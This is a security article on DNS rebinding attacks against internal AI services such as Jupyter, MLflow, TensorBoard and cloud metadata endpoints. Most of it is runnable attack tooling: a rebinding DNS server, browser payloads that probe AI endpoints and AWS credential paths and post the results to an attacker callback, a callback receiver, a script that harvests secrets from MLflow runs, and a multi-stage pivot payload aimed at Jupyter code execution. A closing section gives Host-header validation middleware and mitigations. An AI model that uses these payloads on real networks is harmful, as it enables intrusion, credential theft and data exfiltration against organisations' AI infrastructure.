DNS Rebinding Attacks Against AI Services
Exploiting DNS rebinding to bypass network controls and access internal AI model serving endpoints, training dashboards, and GPU management interfaces
Overview
DNS rebinding is a class of attack that exploits the gap between DNS resolution and the browser's same-origin policy to access services on internal networks from a victim's browser. The attack works by serving a web page from a domain the attacker controls, then changing that domain's DNS record to resolve to an internal IP address. Because the browser considers subsequent requests to be to the "same origin" (same domain), it allows JavaScript on the page to read responses from the internal service.
AI infrastructure is particularly susceptible to DNS rebinding because many AI tools and services are designed as web applications that bind to all interfaces by default and lack Host header validation. Jupyter notebooks, TensorBoard instances, MLflow dashboards, Weights & Biases local servers, GPU monitoring tools (NVIDIA DCGM, Grafana dashboards), and model serving endpoints all commonly run on internal networks with the assumption that network segmentation provides sufficient protection. DNS rebinding pierces that assumption.
The impact of DNS rebinding against AI infrastructure ranges from information disclosure (reading model metrics, training configurations, experiment results) to full system compromise (executing code through Jupyter notebooks, registering malicious models through management APIs, accessing cloud credentials through metadata services). In multi-tenant GPU clusters, a successful DNS rebinding attack from one tenant's browser session could access another tenant's training infrastructure.
This article covers the mechanics of DNS rebinding in the context of AI services, demonstrates practical attacks against common AI tools, and provides defense strategies that AI platform teams should implement.
How DNS Rebinding Works
The Attack Mechanism
DNS rebinding exploits a fundamental timing issue in how browsers enforce the same-origin policy. The origin is determined by the protocol, hostname, and port — but the IP address that hostname resolves to can change between requests without violating the same-origin policy.
The attack flow:
- Attacker registers a domain (e.g.,
evil.example.com) and controls its authoritative DNS server. - Victim visits attacker's page at
http://evil.example.com. The browser resolves the domain to the attacker's server IP (e.g.,203.0.113.10). - Attacker's page loads JavaScript that will make subsequent requests to
evil.example.com. - DNS record changes: The attacker's DNS server is configured with a very low TTL (1 second). When the browser needs to re-resolve the domain, the DNS server returns an internal IP address (e.g.,
10.0.1.50— the address of an internal Jupyter server). - JavaScript makes requests to
http://evil.example.com:8888. The browser resolves this to10.0.1.50:8888and sends the request. Because the origin (evil.example.com) has not changed, the browser allows JavaScript to read the response. - Attacker reads internal service data through the victim's browser, using it as a proxy to the internal network.
"""
DNS rebinding attack server for targeting internal AI services.
This implements:
1. A custom DNS server that alternates between external and internal IPs
2. An HTTP server that serves the attack payload
3. A callback receiver for exfiltrated data
WARNING: For authorized security testing only. DNS rebinding attacks
against systems without permission is illegal.
"""
import socket
import struct
import threading
import http.server
import json
import time
from dataclasses import dataclass
from typing import Optional
@dataclass
class RebindConfig:
"""Configuration for DNS rebinding attack."""
domain: str # Attacker-controlled domain
external_ip: str # Attacker's server IP
internal_ip: str # Target internal AI service IP
internal_port: int # Target service port
ttl: int = 1 # DNS TTL in seconds
rebind_after: int = 2 # Seconds before switching to internal IP
class DNSRebindServer:
"""
Minimal DNS server that returns external IP for initial queries
and internal IP for subsequent queries (after rebind_after seconds).
"""
def __init__(self, config: RebindConfig, listen_port: int = 53):
self.config = config
self.listen_port = listen_port
self.first_query_time: dict[str, float] = {}
def build_dns_response(
self,
query_data: bytes,
response_ip: str,
) -> bytes:
"""Build a minimal DNS A record response."""
# Parse query header
transaction_id = query_data[:2]
# Build response header
flags = b'\x81\x80' # Standard response, no error
questions = b'\x00\x01'
answers = b'\x00\x01'
authority = b'\x00\x00'
additional = b'\x00\x00'
header = transaction_id + flags + questions + answers + authority + additional
# Copy the question section from query
# Skip header (12 bytes), find end of question
question_end = 12
while query_data[question_end] != 0:
question_end += query_data[question_end] + 1
question_end += 5 # null byte + QTYPE(2) + QCLASS(2)
question = query_data[12:question_end]
# Build answer: pointer to name in question + A record
answer = b'\xc0\x0c' # Pointer to name in question section
answer += b'\x00\x01' # Type A
answer += b'\x00\x01' # Class IN
answer += struct.pack('>I', self.config.ttl) # TTL
answer += b'\x00\x04' # RDLENGTH
answer += socket.inet_aton(response_ip) # IP address
return header + question + answer
def handle_query(self, data: bytes, client_addr: tuple) -> bytes:
"""
Handle DNS query. Return external IP initially,
then switch to internal IP after rebind delay.
"""
client_key = f"{client_addr[0]}"
now = time.time()
if client_key not in self.first_query_time:
self.first_query_time[client_key] = now
elapsed = now - self.first_query_time[client_key]
if elapsed < self.config.rebind_after:
# First phase: return attacker's external IP
response_ip = self.config.external_ip
print(f"[DNS] {client_key}: Responding with external IP {response_ip}")
else:
# Rebind phase: return internal target IP
response_ip = self.config.internal_ip
print(f"[DNS] {client_key}: REBIND -> internal IP {response_ip}")
return self.build_dns_response(data, response_ip)
def serve(self) -> None:
"""Start the DNS server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', self.listen_port))
print(f"[DNS] Listening on port {self.listen_port}")
while True:
data, addr = sock.recvfrom(512)
try:
response = self.handle_query(data, addr)
sock.sendto(response, addr)
except Exception as e:
print(f"[DNS] Error handling query from {addr}: {e}")
def generate_attack_payload(config: RebindConfig) -> str:
"""
Generate the HTML/JavaScript payload served during the initial
connection that will execute after DNS rebinding occurs.
"""
return f"""<!DOCTYPE html>
<html>
<head><title>AI Security Assessment</title></head>
<body>
<div id="status">Initializing...</div>
<script>
const TARGET_PORT = {config.internal_port};
const REBIND_DELAY = {config.rebind_after * 1000 + 2000};
const CALLBACK_URL = "http://{config.external_ip}:9090/callback";
// Common AI service endpoints to probe after rebinding
const AI_ENDPOINTS = [
// Jupyter Notebook
{{path: "/api/sessions", name: "Jupyter Sessions"}},
{{path: "/api/kernels", name: "Jupyter Kernels"}},
{{path: "/api/contents", name: "Jupyter File Browser"}},
// MLflow
{{path: "/api/2.0/mlflow/experiments/list", name: "MLflow Experiments"}},
{{path: "/api/2.0/mlflow/registered-models/list", name: "MLflow Models"}},
// TensorBoard
{{path: "/data/runs", name: "TensorBoard Runs"}},
{{path: "/data/scalars", name: "TensorBoard Scalars"}},
// TorchServe Management
{{path: "/models", name: "TorchServe Models"}},
// Triton
{{path: "/v2", name: "Triton Server Info"}},
{{path: "/v2/repository/index", name: "Triton Model Repository"}},
// Prometheus/Grafana metrics
{{path: "/metrics", name: "Prometheus Metrics"}},
{{path: "/api/datasources", name: "Grafana Datasources"}},
// Cloud metadata (if accessible through rebinding)
{{path: "/latest/meta-data/iam/security-credentials/", name: "AWS IMDSv1"}},
];
function updateStatus(msg) {{
document.getElementById("status").innerText = msg;
console.log(msg);
}}
function exfiltrate(endpoint_name, data) {{
// Send discovered data back to attacker's callback server
fetch(CALLBACK_URL, {{
method: "POST",
mode: "no-cors",
headers: {{"Content-Type": "application/json"}},
body: JSON.stringify({{
endpoint: endpoint_name,
data: data,
timestamp: new Date().toISOString()
}})
}}).catch(() => {{}});
}}
async function probeEndpoint(endpoint) {{
try {{
const resp = await fetch(
`http://{config.domain}:${{TARGET_PORT}}${{endpoint.path}}`,
{{credentials: "omit"}}
);
if (resp.ok) {{
const text = await resp.text();
updateStatus(`Found: ${{endpoint.name}}`);
exfiltrate(endpoint.name, text.substring(0, 10000));
return {{name: endpoint.name, status: resp.status, data: text}};
}}
}} catch(e) {{
// Connection refused or CORS error — endpoint not available
}}
return null;
}}
async function runAttack() {{
updateStatus("Waiting for DNS rebinding...");
// Wait for DNS cache to expire and rebind to internal IP
await new Promise(resolve => setTimeout(resolve, REBIND_DELAY));
updateStatus("DNS rebind complete. Probing internal services...");
const results = [];
for (const endpoint of AI_ENDPOINTS) {{
const result = await probeEndpoint(endpoint);
if (result) {{
results.push(result);
}}
}}
updateStatus(`Scan complete. Found ${{results.length}} accessible endpoints.`);
exfiltrate("scan_summary", JSON.stringify(results.map(r => r.name)));
}}
// Start attack after page loads
runAttack();
</script>
</body>
</html>"""
class CallbackServer(http.server.BaseHTTPRequestHandler):
"""HTTP server to receive exfiltrated data from DNS rebinding attack."""
collected_data: list = []
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
try:
data = json.loads(body)
CallbackServer.collected_data.append(data)
print(f"[CALLBACK] Received: {data.get('endpoint', 'unknown')}")
except json.JSONDecodeError:
print(f"[CALLBACK] Raw data: {body[:200]}")
self.send_response(200)
self.end_headers()
def log_message(self, format, *args):
pass # Suppress default logging
if __name__ == "__main__":
import sys
if len(sys.argv) != 4:
print(
f"Usage: {sys.argv[0]} <domain> <internal_ip> <internal_port>\n"
f"Example: {sys.argv[0]} evil.example.com 10.0.1.50 8888"
)
sys.exit(1)
config = RebindConfig(
domain=sys.argv[1],
external_ip="0.0.0.0", # Will be determined from interface
internal_ip=sys.argv[2],
internal_port=int(sys.argv[3]),
)
# Generate and save the attack payload
payload = generate_attack_payload(config)
with open("index.html", "w") as f:
f.write(payload)
print(f"[*] Attack payload written to index.html")
print(f"[*] Target: {config.internal_ip}:{config.internal_port}")
print(f"[*] Start DNS server on port 53 and HTTP server on port 80")Vulnerable AI Service Configurations
Jupyter Notebooks
Jupyter is one of the most common targets for DNS rebinding in AI environments. By default, Jupyter Notebook and JupyterLab bind to 0.0.0.0 or localhost with token-based authentication. However, many deployments disable token authentication for convenience (especially in Docker containers and Kubernetes pods), relying on network isolation instead.
A successful DNS rebinding attack against a Jupyter instance provides:
- Remote code execution: The Jupyter API allows creating and executing kernels with arbitrary code.
- File system access: The contents API provides read/write access to the server's filesystem.
- Credential theft: Notebooks often contain inline credentials, API keys, and cloud configuration.
The attack is particularly effective because Jupyter does not validate the Host header by default, and its REST API returns JSON responses that are easily parsed by JavaScript after rebinding.
MLflow Tracking Server
MLflow's tracking server exposes a REST API for logging experiments, metrics, parameters, and artifacts. It typically runs without authentication on internal networks. Through DNS rebinding, an attacker can:
- Enumerate all experiments and model runs
- Download model artifacts (including model weights)
- Read logged parameters that may contain hyperparameters, dataset paths, or configuration secrets
- Register new models or modify existing model stages
GPU Management Interfaces
NVIDIA's Data Center GPU Manager (DCGM) and associated monitoring tools like DCGM Exporter expose metrics via HTTP. While metrics may seem low-risk, they reveal:
- GPU utilization patterns that indicate when training jobs run
- Memory usage that reveals model sizes
- Error rates that may indicate vulnerability to fault injection
- Topology information about the GPU cluster
Practical Examples
Targeted Attack Against Internal MLflow
"""
Post-rebinding exploitation script for MLflow tracking server.
After DNS rebinding succeeds, this code (running in the victim's
browser context) extracts experiment data and model artifacts.
This Python version demonstrates the same logic that would run
as JavaScript in the browser payload.
"""
import requests
from typing import Any
class MLflowExfiltrator:
"""
Extract data from an MLflow tracking server accessed
via DNS rebinding (or direct access in testing).
"""
def __init__(self, base_url: str):
self.base_url = base_url.rstrip("/")
self.session = requests.Session()
def list_experiments(self) -> list[dict]:
"""List all experiments in the MLflow instance."""
resp = self.session.get(
f"{self.base_url}/api/2.0/mlflow/experiments/search",
params={"max_results": 1000},
)
resp.raise_for_status()
return resp.json().get("experiments", [])
def get_runs(self, experiment_id: str) -> list[dict]:
"""Get all runs for an experiment."""
resp = self.session.post(
f"{self.base_url}/api/2.0/mlflow/runs/search",
json={
"experiment_ids": [experiment_id],
"max_results": 1000,
},
)
resp.raise_for_status()
return resp.json().get("runs", [])
def extract_sensitive_params(
self, runs: list[dict]
) -> list[dict]:
"""
Extract parameters that may contain sensitive information
such as data paths, API keys, or connection strings.
"""
sensitive_patterns = [
"password", "secret", "key", "token", "credential",
"connection_string", "database", "s3://", "gs://",
"azure", "endpoint", "api_key",
]
sensitive_findings = []
for run in runs:
run_id = run.get("info", {}).get("run_id", "unknown")
params = run.get("data", {}).get("params", [])
for param in params:
key = param.get("key", "").lower()
value = param.get("value", "")
for pattern in sensitive_patterns:
if pattern in key or pattern in value.lower():
sensitive_findings.append({
"run_id": run_id,
"param_key": param["key"],
"param_value": value,
"matched_pattern": pattern,
})
break
return sensitive_findings
def list_registered_models(self) -> list[dict]:
"""List all registered models."""
resp = self.session.get(
f"{self.base_url}/api/2.0/mlflow/registered-models/list",
params={"max_results": 1000},
)
resp.raise_for_status()
return resp.json().get("registered_models", [])
def full_extraction(self) -> dict[str, Any]:
"""Run full extraction against the MLflow instance."""
results: dict[str, Any] = {
"experiments": [],
"sensitive_params": [],
"registered_models": [],
}
experiments = self.list_experiments()
results["experiments"] = [
{"id": e.get("experiment_id"), "name": e.get("name")}
for e in experiments
]
for exp in experiments:
exp_id = exp.get("experiment_id")
if exp_id:
runs = self.get_runs(exp_id)
sensitive = self.extract_sensitive_params(runs)
results["sensitive_params"].extend(sensitive)
results["registered_models"] = self.list_registered_models()
return results
if __name__ == "__main__":
import sys
import json
url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
extractor = MLflowExfiltrator(url)
try:
results = extractor.full_extraction()
print(json.dumps(results, indent=2, default=str))
except requests.ConnectionError:
print(f"Could not connect to MLflow at {url}")
except Exception as e:
print(f"Error during extraction: {e}")Advanced Attack Scenarios
Chaining DNS Rebinding with Cloud Metadata Services
One of the most impactful DNS rebinding attack chains targets cloud metadata services through AI infrastructure. When an AI service runs on a cloud instance (EC2, GCE, Azure VM), the instance metadata service is accessible at a well-known IP address (169.254.169.254 for AWS, 169.254.169.254 for GCP, 169.254.169.254 for Azure). DNS rebinding can be used to reach this endpoint through the victim's browser, even if the attacker cannot directly reach the AI service.
The attack chain works as follows: the attacker's DNS rebinding payload first rebinds to an internal AI service (such as a Jupyter notebook on 10.0.1.50). If the AI service is not vulnerable or not interesting, the payload can rebind again to the cloud metadata service at 169.254.169.254. AWS IMDSv1 does not require any special headers, so a simple GET request from the rebounded domain can retrieve instance credentials, including IAM role credentials that may have broad access to S3 buckets containing training data and model artifacts.
AWS IMDSv2 mitigates this by requiring a session token obtained through a PUT request with a specific header (X-aws-ec2-metadata-token-ttl-seconds). However, many AI deployments still use IMDSv1 or have misconfigured their instance metadata options. GCP and Azure have similar token-based protections that may or may not be enforced.
Attacking Jupyter Notebooks via DNS Rebinding
Jupyter notebooks are particularly valuable DNS rebinding targets because they provide full code execution capability. The attack proceeds through the Jupyter REST API:
- After DNS rebinding resolves to the internal Jupyter server, the attacker's JavaScript calls
/api/sessionsto list active sessions. - If no kernel is running, the attacker creates a new kernel via
POST /api/kernels. - The attacker sends code execution requests via the WebSocket connection to the kernel. WebSocket connections established after the DNS rebind inherit the rebounded resolution, allowing real-time code execution.
- Through the kernel, the attacker can read files from the filesystem (including training data, model weights, and configuration files containing credentials), install backdoors, or pivot to other internal services.
The WebSocket-based kernel communication is particularly dangerous because it provides a persistent, bidirectional channel after the initial rebinding succeeds. Even if the DNS rebinds back to the external IP, existing WebSocket connections remain active.
Browser-Based GPU Access
In some AI development environments, GPU monitoring interfaces (NVIDIA GPU Cloud dashboard, Jupyter with GPU extensions, Gradio demo interfaces) are exposed on internal networks. DNS rebinding to these interfaces can reveal detailed GPU utilization information, running processes, and memory contents. While this is primarily an information disclosure issue, the leaked data can reveal model architectures, training progress, and the identity of users running GPU workloads — all valuable reconnaissance for further attacks.
Multi-Stage Rebinding for Network Pivoting
Sophisticated attackers may use multiple rounds of DNS rebinding to pivot through an AI infrastructure network. The first rebind reaches an external-facing service like a model demo (Gradio, Streamlit). The second rebind uses information gathered from the first stage to target internal infrastructure like the model registry or training data storage. Each stage provides new information about the internal network topology and service locations.
"""
Multi-stage DNS rebinding orchestrator for AI infrastructure pivoting.
Coordinates multiple rebinding rounds to progressively access
deeper internal services.
"""
import json
import time
from typing import Optional
from dataclasses import dataclass, field
@dataclass
class RebindStage:
"""Configuration for one stage of multi-stage rebinding."""
name: str
target_ip: str
target_port: int
endpoints_to_probe: list[str]
data_to_extract: list[str]
next_stage_info: Optional[str] = None # Info to look for to plan next stage
@dataclass
class PivotPlan:
"""Multi-stage rebinding attack plan."""
stages: list[RebindStage] = field(default_factory=list)
def add_stage(self, stage: RebindStage) -> None:
self.stages.append(stage)
def generate_payload(self, callback_url: str) -> str:
"""Generate JavaScript payload that executes all stages sequentially."""
stages_json = json.dumps([
{
"name": s.name,
"ip": s.target_ip,
"port": s.target_port,
"endpoints": s.endpoints_to_probe,
"extract": s.data_to_extract,
}
for s in self.stages
])
return f"""
// Multi-stage DNS rebinding payload
const STAGES = {stages_json};
const CALLBACK = "{callback_url}";
let stageResults = {{}};
async function executeStage(stage, stageIndex) {{
console.log(`Executing stage ${{stageIndex}}: ${{stage.name}}`);
// Signal DNS server to rebind to this stage's target
await fetch(`${{CALLBACK}}/rebind?ip=${{stage.ip}}&port=${{stage.port}}`);
// Wait for DNS cache to expire
await new Promise(r => setTimeout(r, 3000));
let results = {{}};
for (const endpoint of stage.endpoints) {{
try {{
const resp = await fetch(
`http://${{window.location.hostname}}:${{stage.port}}${{endpoint}}`,
{{credentials: 'omit'}}
);
if (resp.ok) {{
results[endpoint] = await resp.text();
}}
}} catch(e) {{}}
}}
stageResults[stage.name] = results;
// Send results back to attacker
await fetch(`${{CALLBACK}}/results`, {{
method: 'POST',
mode: 'no-cors',
body: JSON.stringify({{stage: stage.name, data: results}})
}});
return results;
}}
async function runAllStages() {{
for (let i = 0; i < STAGES.length; i++) {{
await executeStage(STAGES[i], i);
}}
}}
runAllStages();
"""
def create_ai_infrastructure_pivot_plan() -> PivotPlan:
"""
Create a pivot plan for typical AI infrastructure layout.
Stage 1: Reconnaissance via exposed demo/dashboard
Stage 2: Access model registry for model enumeration
Stage 3: Access training data storage metadata
"""
plan = PivotPlan()
plan.add_stage(RebindStage(
name="recon_dashboard",
target_ip="10.0.1.10",
target_port=3000,
endpoints_to_probe=[
"/api/datasources", # Grafana datasources reveal internal services
"/api/search", # Grafana dashboards reveal infrastructure
],
data_to_extract=["datasource_urls", "dashboard_names"],
next_stage_info="Look for MLflow/model registry URLs in datasources",
))
plan.add_stage(RebindStage(
name="model_registry",
target_ip="10.0.1.20",
target_port=5000,
endpoints_to_probe=[
"/api/2.0/mlflow/experiments/list",
"/api/2.0/mlflow/registered-models/list",
],
data_to_extract=["experiment_names", "model_artifacts_locations"],
next_stage_info="Extract S3/GCS paths from artifact locations",
))
plan.add_stage(RebindStage(
name="jupyter_rce",
target_ip="10.0.1.30",
target_port=8888,
endpoints_to_probe=[
"/api/sessions",
"/api/kernels",
"/api/contents",
],
data_to_extract=["running_notebooks", "filesystem_listing"],
))
return planDefense and Mitigation
Host header validation is the most direct defense against DNS rebinding. Every AI service should validate that the HTTP Host header matches expected values and reject requests with unexpected hosts:
"""
Middleware for Host header validation in AI services.
Drop-in protection against DNS rebinding attacks.
"""
from functools import wraps
from typing import Callable, Optional
import ipaddress
class HostHeaderValidator:
"""
Validates HTTP Host headers to prevent DNS rebinding.
Allows requests only from explicitly permitted hostnames.
"""
def __init__(
self,
allowed_hosts: list[str],
allow_ip_access: bool = False,
):
"""
Args:
allowed_hosts: List of allowed hostnames
(e.g., ["mlflow.internal.company.com", "localhost"])
allow_ip_access: Whether to allow direct IP access.
Should be False in production.
"""
self.allowed_hosts = set(
h.lower().strip() for h in allowed_hosts
)
self.allow_ip_access = allow_ip_access
def is_valid_host(self, host_header: str) -> bool:
"""Check if the Host header value is allowed."""
if not host_header:
return False
# Strip port if present
host = host_header.split(":")[0].lower().strip()
# Check against allowed list
if host in self.allowed_hosts:
return True
# Optionally allow direct IP access (for development)
if self.allow_ip_access:
try:
ipaddress.ip_address(host)
return True
except ValueError:
pass
return False
def flask_middleware(self, app):
"""Flask middleware for Host header validation."""
from flask import request, abort
@app.before_request
def check_host():
host = request.host
if not self.is_valid_host(host):
abort(403, f"Host header '{host}' not allowed")
return app
def fastapi_middleware(self):
"""FastAPI/Starlette middleware for Host header validation."""
from starlette.middleware.base import (
BaseHTTPMiddleware,
)
from starlette.responses import Response
validator = self
class HostValidationMiddleware(BaseHTTPMiddleware):
async def dispatch(self, request, call_next):
host = request.headers.get("host", "")
if not validator.is_valid_host(host):
return Response(
content=f"Host header '{host}' not allowed",
status_code=403,
)
return await call_next(request)
return HostValidationMiddlewareDNS pinning and rebinding protection at the infrastructure level:
- Configure DNS resolvers to reject private IP addresses in responses for external domains (DNS rebinding protection in dnsmasq, Unbound, or cloud DNS).
- Use browser-level protections where available (Private Network Access specification in Chromium).
- Deploy internal services with TLS certificates that are validated by clients — a DNS-rebound domain will not have a valid certificate for the internal service hostname.
Network-level defenses:
- Bind AI services to specific internal interfaces, not
0.0.0.0. - Require authentication for all AI tools, even on internal networks. Jupyter should always require tokens; MLflow should use authentication proxies.
- Use IMDSv2 (token-required) for AWS cloud metadata to prevent SSRF and rebinding-based metadata theft.
- Implement egress filtering to prevent internal services from connecting to attacker-controlled domains.
Browser isolation for AI development: Consider deploying browser isolation solutions for teams that regularly access internal AI dashboards and notebooks. Browser isolation runs the browser rendering engine in a remote sandbox, preventing the local browser from directly accessing internal network resources. This eliminates DNS rebinding as an attack vector because the rebounded requests originate from the isolation service's network, not the internal AI network.
WebSocket security: Since many AI services use WebSockets (Jupyter kernels, streaming inference, real-time monitoring dashboards), implement WebSocket-specific protections against DNS rebinding. Validate the Origin header on WebSocket upgrade requests, require authentication tokens in the WebSocket handshake (not just the initial HTTP request), and implement per-connection rate limiting.
Service discovery hardening: In environments using service discovery (Consul, CoreDNS, Kubernetes DNS), ensure that internal service names are not resolvable from external networks. DNS rebinding is only effective if the attacker knows the internal IP addresses or hostnames of target services. Minimize information disclosure from public-facing services that could reveal internal topology.
References
- Dorsey, B. (2024). "Attacking Private Networks from the Internet with DNS Rebinding." https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
- Singularity of Origin. (2024). "A DNS Rebinding Attack Framework." NCC Group. https://github.com/nccgroup/singularity
- OWASP. (2024). "DNS Rebinding." OWASP Web Security Testing Guide. https://owasp.org/www-community/attacks/DNS_Rebinding
- MITRE ATLAS. "Initial Access via Web-based Exploitation of ML Services." https://atlas.mitre.org/